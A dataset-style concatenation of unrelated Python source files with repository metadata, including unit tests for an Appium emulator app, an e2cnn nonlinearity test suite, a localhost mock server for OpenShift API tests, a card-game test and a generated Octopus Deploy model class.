ans.appendleft(n - index)
print(*ans)
exit()
if s[index + j] == '0':
ans.appendleft(j)
index += j
break
else:
print(-1)
exit()
| 22.423077
| 38
| 0.538593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.005146
|
65cd5a403032e83361e632b7cbcf870eef107bce
| 1,790
|
py
|
Python
|
src/tests/__init__.py
|
laichimirum/docker-appium-emulator
|
3549c5f1fc09bbc650dd30351ad4f509a72a90fa
|
[
"Apache-2.0"
] | 8
|
2019-04-26T04:09:40.000Z
|
2022-01-04T05:24:12.000Z
|
src/tests/__init__.py
|
laichimirum/docker-appium-emulator
|
3549c5f1fc09bbc650dd30351ad4f509a72a90fa
|
[
"Apache-2.0"
] | null | null | null |
src/tests/__init__.py
|
laichimirum/docker-appium-emulator
|
3549c5f1fc09bbc650dd30351ad4f509a72a90fa
|
[
"Apache-2.0"
] | 2
|
2019-12-16T15:34:57.000Z
|
2020-10-22T07:03:15.000Z
|
"""Unit test to test app."""
import os
from unittest import TestCase
import mock
from src import app
class TestApp(TestCase):
"""Unit test class to test other methods in the app."""
def test_valid_env(self):
key = 'ENV_1'
os.environ[key] = 'test'
app.get_or_raise(key)
del os.environ[key]
def test_invalid_env(self):
with self.assertRaises(RuntimeError):
app.get_or_raise('ENV_2')
def test_valid_bool(self):
self.assertEqual(app.str_to_bool('True'), True)
self.assertEqual(app.str_to_bool('t'), True)
self.assertEqual(app.str_to_bool('1'), True)
self.assertEqual(app.str_to_bool('YES'), True)
def test_invalid_bool(self):
self.assertEqual(app.str_to_bool(''), False)
self.assertEqual(app.str_to_bool('test'), False)
def test_invalid_format(self):
self.assertEqual(app.str_to_bool(True), None)
@mock.patch('src.app.prepare_avd')
@mock.patch('subprocess.Popen')
def test_run_with_appium(self, mocked_avd, mocked_subprocess):
with mock.patch('src.app.appium_run') as mocked_appium:
os.environ['APPIUM'] = str(True)
app.run()
self.assertTrue(mocked_avd.called)
self.assertTrue(mocked_subprocess.called)
self.assertTrue(mocked_appium.called)
@mock.patch('src.app.prepare_avd')
@mock.patch('subprocess.Popen')
def test_run_withhout_appium(self, mocked_avd, mocked_subprocess):
with mock.patch('src.app.appium_run') as mocked_appium:
os.environ['APPIUM'] = str(False)
app.run()
self.assertTrue(mocked_avd.called)
self.assertTrue(mocked_subprocess.called)
self.assertFalse(mocked_appium.called)
| 32.545455
| 70
| 0.653073
| 1,684
| 0.940782
| 0
| 0
| 844
| 0.471508
| 0
| 0
| 262
| 0.146369
|
65cdd034fed36877b4031f60332f1c40cdb5f6a5
| 2,224
|
py
|
Python
|
tools/python-mock-server/python-mock-server.py
|
msmagnanijr/jboss-kie-modules
|
1ab85aa12e70db810a4d607fb6aaa85a19bb8607
|
[
"Apache-2.0"
] | 8
|
2018-07-20T02:32:39.000Z
|
2022-03-27T10:52:55.000Z
|
tools/python-mock-server/python-mock-server.py
|
msmagnanijr/jboss-kie-modules
|
1ab85aa12e70db810a4d607fb6aaa85a19bb8607
|
[
"Apache-2.0"
] | 167
|
2017-12-19T14:33:35.000Z
|
2022-03-22T11:47:20.000Z
|
tools/python-mock-server/python-mock-server.py
|
msmagnanijr/jboss-kie-modules
|
1ab85aa12e70db810a4d607fb6aaa85a19bb8607
|
[
"Apache-2.0"
] | 52
|
2017-12-18T13:55:24.000Z
|
2022-02-09T14:07:14.000Z
|
#!/usr/bin/python3
import os
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
# do not change paths
if self.path == '/apis/apps.openshift.io/v1/namespaces/testNamespace/deploymentconfigs?labelSelector=services.server.kie.org%2Fkie-server-id%3Drhpam-kieserevr-scale-up':
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
test = os.path.join(sys.path[0], "responses/kieserver-dc.json")
response = open(test, "r").read()
self.wfile.write(response.encode(encoding='utf_8'))
# do not change paths
if self.path == '/apis/apps.openshift.io/v1/namespaces/testNamespace/deploymentconfigs?labelSelector=services.server.kie.org%2Fkie-server-id%3Drhpam-kieserevr-scale-down':
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
test = os.path.join(sys.path[0], "responses/kieserver-dc-0-replicas.json")
response = open(test, "r").read()
self.wfile.write(response.encode(encoding='utf_8'))
if self.path == '/apis/apps.openshift.io/v1/namespaces/testNamespace/deploymentconfigs/rhpam-central-console':
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
test = os.path.join(sys.path[0], "responses/bc-dc.json")
response = open(test, "r").read()
self.wfile.write(response.encode(encoding='utf_8'))
if self.path == '/halt':
print("Halting server")
self.send_response(200)
self.end_headers()
sys.exit()
# for patch method, only return 200 for any path
def do_PATCH(self):
self.send_response(200)
# for put method, only return 200 for any path
def do_PUT(self):
self.send_response(200)
# for put method, only return 200 for any path
def do_DELETE(self):
self.send_response(200)
httpd = HTTPServer(("localhost", 8080), MyHandler)
httpd.serve_forever()
| 37.694915
| 179
| 0.642536
| 2,045
| 0.919514
| 0
| 0
| 0
| 0
| 0
| 0
| 850
| 0.382194
|
65cff554030214e04d5a8a2df9a42dced600b89e
| 11,487
|
py
|
Python
|
test/nn/test_nonlinearities_fliprotations.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 356
|
2019-11-22T10:37:22.000Z
|
2022-03-25T14:42:45.000Z
|
test/nn/test_nonlinearities_fliprotations.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 52
|
2020-01-20T16:51:36.000Z
|
2022-03-31T21:40:19.000Z
|
test/nn/test_nonlinearities_fliprotations.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 48
|
2019-12-11T09:29:30.000Z
|
2022-03-18T17:51:55.000Z
|
import unittest
from unittest import TestCase
from e2cnn.nn import *
from e2cnn.gspaces import *
import random
class TestNonLinearitiesFlipRotations(TestCase):
def test_dihedral_norm_relu(self):
N = 8
g = FlipRot2dOnR2(N)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_dihedral_norm_sigmoid(self):
N = 8
g = FlipRot2dOnR2(N)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_sigmoid')
nnl.check_equivariance()
def test_dihedral_pointwise_relu(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_relu')
nnl.check_equivariance()
def test_dihedral_pointwise_sigmoid(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_sigmoid')
nnl.check_equivariance()
def test_dihedral_gated_one_input_shuffled_gated(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_one_input_sorted_gated(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
r = FieldType(g, reprs).sorted()
ngates = len(r)
reprs = [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = r + FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_one_input_all_shuffled(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
t = list(zip(reprs, gates))
random.shuffle(t)
reprs, gates = zip(*t)
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_two_inputs_shuffled_gated(self):
N = 8
g = FlipRot2dOnR2(N)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_gated_two_inputs_sorted_gated(self):
N = 8
g = FlipRot2dOnR2(N)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated).sorted()
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_concat_relu(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'concatenated' in r.supported_nonlinearities]
for rep in reprs:
r = FieldType(g, [rep])
nnl = ConcatenatedNonLinearity(r, function='c_relu')
nnl.check_equivariance()
def test_dihedral_induced_norm_relu(self):
N = 9
g = FlipRot2dOnR2(N)
sg_id = (None, N)
so2, _, _ = g.fibergroup.subgroup(sg_id)
r = FieldType(g, [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, int(N // 2))] * 4).sorted()
nnl = InducedNormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_induced_norm_relu(self):
g = FlipRot2dOnR2(-1, 10)
sg_id = (None, -1)
so2, _, _ = g.fibergroup.subgroup(sg_id)
r = FieldType(g, [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, 7)] * 4).sorted()
nnl = InducedNormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_induced_gated(self):
g = FlipRot2dOnR2(-1, 10)
sg_id = (None, -1)
so2, _, _ = g.fibergroup.subgroup(sg_id)
reprs = [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, 3)] * 5
ngates = len(reprs)
reprs += [g.induced_repr(sg_id, so2.trivial_representation)] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = InducedGatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_norm_relu(self):
g = FlipRot2dOnR2(-1, 10)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_norm_sigmoid(self):
g = FlipRot2dOnR2(-1, 10)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_sigmoid')
nnl.check_equivariance()
def test_o2_pointwise_relu(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_relu')
nnl.check_equivariance()
def test_o2_pointwise_sigmoid(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_sigmoid')
nnl.check_equivariance()
def test_o2_gated_one_input_shuffled_gated(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_one_input_sorted_gated(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
r = FieldType(g, reprs).sorted()
ngates = len(r)
reprs = [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = r + FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_one_input_all_shuffled(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
t = list(zip(reprs, gates))
random.shuffle(t)
reprs, gates = zip(*t)
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_two_inputs_shuffled_gated(self):
g = FlipRot2dOnR2(-1, 10)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_o2_gated_two_inputs_sorted_gated(self):
g = FlipRot2dOnR2(-1, 10)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gated = FieldType(g, gated).sorted()
gates = FieldType(g, gates)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_gated1_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'gated' not in r.supported_nonlinearities:
r1 = FieldType(g, [r, g.trivial_repr])
gates = ['gated', 'gate']
self.assertRaises(AssertionError, GatedNonLinearity1, r1, gates=gates)
for r in g.representations.values():
if 'gate' not in r.supported_nonlinearities:
r1 = FieldType(g, [g.trivial_repr, r])
gates = ['gated', 'gate']
self.assertRaises(AssertionError, GatedNonLinearity1, r1, gates=gates)
def test_dihedral_gated2_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'gated' not in r.supported_nonlinearities:
gates = FieldType(g, [g.trivial_repr])
gated = FieldType(g, [r])
self.assertRaises(AssertionError, GatedNonLinearity2, (gates, gated))
for r in g.representations.values():
if 'gate' not in r.supported_nonlinearities:
gates = FieldType(g, [r])
gated = FieldType(g, [g.trivial_repr])
self.assertRaises(AssertionError, GatedNonLinearity2, (gates, gated))
def test_dihedral_norm_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'norm' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, NormNonLinearity, r1)
def test_dihedral_pointwise_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'pointwise' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, PointwiseNonLinearity, r1)
def test_dihedral_concat_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'concatenated' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, ConcatenatedNonLinearity, r1)
if __name__ == '__main__':
unittest.main()
| 30.149606
| 107
| 0.572038
| 11,322
| 0.985636
| 0
| 0
| 0
| 0
| 0
| 0
| 412
| 0.035867
|
65d01a4d1ad87624330d3bcc5a359ecdd7b3f0fa
| 5,880
|
py
|
Python
|
TestModule/AnonymousPlayerTest.py
|
INYEONGKIM/Quattro
|
0fd70b08716f71404f520941791cd314d90de83a
|
[
"MIT"
] | null | null | null |
TestModule/AnonymousPlayerTest.py
|
INYEONGKIM/Quattro
|
0fd70b08716f71404f520941791cd314d90de83a
|
[
"MIT"
] | null | null | null |
TestModule/AnonymousPlayerTest.py
|
INYEONGKIM/Quattro
|
0fd70b08716f71404f520941791cd314d90de83a
|
[
"MIT"
] | null | null | null |
import unittest
from QuattroComponents.Player import Anonymous_player
from QuattroComponents.Card import Card
from TestModule.GetMethodName import get_method_name_decorator
from collections import deque
def reset_player_attributes(anonymous: Anonymous_player):
anonymous.player1_changed = False
anonymous.player2_changed = False
class AnonymousPlayerTest(unittest.TestCase):
# this card doesn't care
origin_card = Card(number=1, color="green", isOpen=False)
method_names = set()
@get_method_name_decorator
def test_correct_zero_card_change(self):
# Zero idx 0
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=0, color="zero", isOpen=False),
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card, opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# Zero idx 1
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False),
Card(number=2, color="red", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card, opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# Zero idx 2
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False)
])
opened_deck = deque([])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
# with opened_deck
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="red", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=0, color="zero", isOpen=False)
])
opened_deck = deque([Card(number=3, color="blue", isOpen=False)])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 0)
self.assertEqual(return_card.color, 'zero')
self.assertTrue(anonymous.player2_changed)
@get_method_name_decorator
def test_made_quattro_card_change(self):
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="blue", isOpen=False),
Card(number=1, color="yellow", isOpen=False),
Card(number=1, color="red", isOpen=False)
])
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 1)
self.assertEqual(return_card.color, 'yellow')
self.assertTrue(anonymous.player2_changed)
@get_method_name_decorator
def test_top_card_change(self):
anonymous = Anonymous_player(user_name="anonymous", user_deck=[
Card(number=1, color="blue", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=1, color="red", isOpen=False)
])
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 2)
self.assertEqual(return_card.color, 'red')
self.assertTrue(anonymous.player2_changed)
reset_player_attributes(anonymous=anonymous)
self.origin_card.isOpen = False
anonymous.user_deck = [
Card(number=2, color="blue", isOpen=False),
Card(number=2, color="red", isOpen=False),
Card(number=1, color="red", isOpen=False)
]
opened_deck = deque([
Card(number=6, color="blue", isOpen=True),
Card(number=6, color="red", isOpen=True),
Card(number=6, color="green", isOpen=True)
])
return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 2)
self.assertEqual(return_card.color, 'red')
self.assertTrue(anonymous.player2_changed)
| 43.880597
| 126
| 0.633844
| 5,538
| 0.941837
| 0
| 0
| 5,358
| 0.911224
| 0
| 0
| 431
| 0.073299
|
65d0a80d19258c77b9d91fc06cfaa6455396ecc8
| 10,012
|
py
|
Python
|
octopus_deploy_swagger_client/models/phase_resource.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/models/phase_resource.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/models/phase_resource.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from octopus_deploy_swagger_client.models.retention_period import RetentionPeriod # noqa: F401,E501
class PhaseResource(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'automatic_deployment_targets': 'list[str]',
'optional_deployment_targets': 'list[str]',
'minimum_environments_before_promotion': 'int',
'is_optional_phase': 'bool',
'release_retention_policy': 'RetentionPeriod',
'tentacle_retention_policy': 'RetentionPeriod'
}
attribute_map = {
'id': 'Id',
'name': 'Name',
'automatic_deployment_targets': 'AutomaticDeploymentTargets',
'optional_deployment_targets': 'OptionalDeploymentTargets',
'minimum_environments_before_promotion': 'MinimumEnvironmentsBeforePromotion',
'is_optional_phase': 'IsOptionalPhase',
'release_retention_policy': 'ReleaseRetentionPolicy',
'tentacle_retention_policy': 'TentacleRetentionPolicy'
}
def __init__(self, id=None, name=None, automatic_deployment_targets=None, optional_deployment_targets=None, minimum_environments_before_promotion=None, is_optional_phase=None, release_retention_policy=None, tentacle_retention_policy=None): # noqa: E501
"""PhaseResource - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._automatic_deployment_targets = None
self._optional_deployment_targets = None
self._minimum_environments_before_promotion = None
self._is_optional_phase = None
self._release_retention_policy = None
self._tentacle_retention_policy = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if automatic_deployment_targets is not None:
self.automatic_deployment_targets = automatic_deployment_targets
if optional_deployment_targets is not None:
self.optional_deployment_targets = optional_deployment_targets
if minimum_environments_before_promotion is not None:
self.minimum_environments_before_promotion = minimum_environments_before_promotion
if is_optional_phase is not None:
self.is_optional_phase = is_optional_phase
if release_retention_policy is not None:
self.release_retention_policy = release_retention_policy
if tentacle_retention_policy is not None:
self.tentacle_retention_policy = tentacle_retention_policy
@property
def id(self):
"""Gets the id of this PhaseResource. # noqa: E501
:return: The id of this PhaseResource. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this PhaseResource.
:param id: The id of this PhaseResource. # noqa: E501
:type: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this PhaseResource. # noqa: E501
:return: The name of this PhaseResource. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this PhaseResource.
:param name: The name of this PhaseResource. # noqa: E501
:type: str
"""
self._name = name
@property
def automatic_deployment_targets(self):
"""Gets the automatic_deployment_targets of this PhaseResource. # noqa: E501
:return: The automatic_deployment_targets of this PhaseResource. # noqa: E501
:rtype: list[str]
"""
return self._automatic_deployment_targets
@automatic_deployment_targets.setter
def automatic_deployment_targets(self, automatic_deployment_targets):
"""Sets the automatic_deployment_targets of this PhaseResource.
:param automatic_deployment_targets: The automatic_deployment_targets of this PhaseResource. # noqa: E501
:type: list[str]
"""
self._automatic_deployment_targets = automatic_deployment_targets
@property
def optional_deployment_targets(self):
"""Gets the optional_deployment_targets of this PhaseResource. # noqa: E501
:return: The optional_deployment_targets of this PhaseResource. # noqa: E501
:rtype: list[str]
"""
return self._optional_deployment_targets
@optional_deployment_targets.setter
def optional_deployment_targets(self, optional_deployment_targets):
"""Sets the optional_deployment_targets of this PhaseResource.
:param optional_deployment_targets: The optional_deployment_targets of this PhaseResource. # noqa: E501
:type: list[str]
"""
self._optional_deployment_targets = optional_deployment_targets
@property
def minimum_environments_before_promotion(self):
"""Gets the minimum_environments_before_promotion of this PhaseResource. # noqa: E501
:return: The minimum_environments_before_promotion of this PhaseResource. # noqa: E501
:rtype: int
"""
return self._minimum_environments_before_promotion
@minimum_environments_before_promotion.setter
def minimum_environments_before_promotion(self, minimum_environments_before_promotion):
"""Sets the minimum_environments_before_promotion of this PhaseResource.
:param minimum_environments_before_promotion: The minimum_environments_before_promotion of this PhaseResource. # noqa: E501
:type: int
"""
self._minimum_environments_before_promotion = minimum_environments_before_promotion
@property
def is_optional_phase(self):
"""Gets the is_optional_phase of this PhaseResource. # noqa: E501
:return: The is_optional_phase of this PhaseResource. # noqa: E501
:rtype: bool
"""
return self._is_optional_phase
@is_optional_phase.setter
def is_optional_phase(self, is_optional_phase):
"""Sets the is_optional_phase of this PhaseResource.
:param is_optional_phase: The is_optional_phase of this PhaseResource. # noqa: E501
:type: bool
"""
self._is_optional_phase = is_optional_phase
@property
def release_retention_policy(self):
"""Gets the release_retention_policy of this PhaseResource. # noqa: E501
:return: The release_retention_policy of this PhaseResource. # noqa: E501
:rtype: RetentionPeriod
"""
return self._release_retention_policy
@release_retention_policy.setter
def release_retention_policy(self, release_retention_policy):
"""Sets the release_retention_policy of this PhaseResource.
:param release_retention_policy: The release_retention_policy of this PhaseResource. # noqa: E501
:type: RetentionPeriod
"""
self._release_retention_policy = release_retention_policy
@property
def tentacle_retention_policy(self):
"""Gets the tentacle_retention_policy of this PhaseResource. # noqa: E501
:return: The tentacle_retention_policy of this PhaseResource. # noqa: E501
:rtype: RetentionPeriod
"""
return self._tentacle_retention_policy
@tentacle_retention_policy.setter
def tentacle_retention_policy(self, tentacle_retention_policy):
"""Sets the tentacle_retention_policy of this PhaseResource.
:param tentacle_retention_policy: The tentacle_retention_policy of this PhaseResource. # noqa: E501
:type: RetentionPeriod
"""
self._tentacle_retention_policy = tentacle_retention_policy
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(PhaseResource, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PhaseResource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 33.373333
| 257
| 0.663504
| 9,510
| 0.94986
| 0
| 0
| 5,074
| 0.506792
| 0
| 0
| 4,724
| 0.471834
|
65d15f45a4747bc3b8090b4f6795c908d2c9cd6a
| 660
|
py
|
Python
|
src/cryptoadvance/specter/util/common.py
|
jonathancross/specter-desktop
|
0178aa3879134415d63d62098b7f4f1b17db1d13
|
[
"MIT"
] | null | null | null |
src/cryptoadvance/specter/util/common.py
|
jonathancross/specter-desktop
|
0178aa3879134415d63d62098b7f4f1b17db1d13
|
[
"MIT"
] | null | null | null |
src/cryptoadvance/specter/util/common.py
|
jonathancross/specter-desktop
|
0178aa3879134415d63d62098b7f4f1b17db1d13
|
[
"MIT"
] | null | null | null |
import re
def str2bool(my_str):
"""returns a reasonable boolean from a string so that "False" will result in False"""
if my_str is None:
return False
elif isinstance(my_str, str) and my_str.lower() == "false":
return False
elif isinstance(my_str, str) and my_str.lower() == "off":
return False
return bool(my_str)
def camelcase2snake_case(name):
"""If you pass DeviceManager it returns device_manager"""
pattern = re.compile(r"(?<!^)(?=[A-Z])")
name = pattern.sub("_", name).lower()
return name
def snake_case2camelcase(word):
return "".join(x.capitalize() or "_" for x in word.split("_"))
| 27.5
| 89
| 0.645455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.277273
|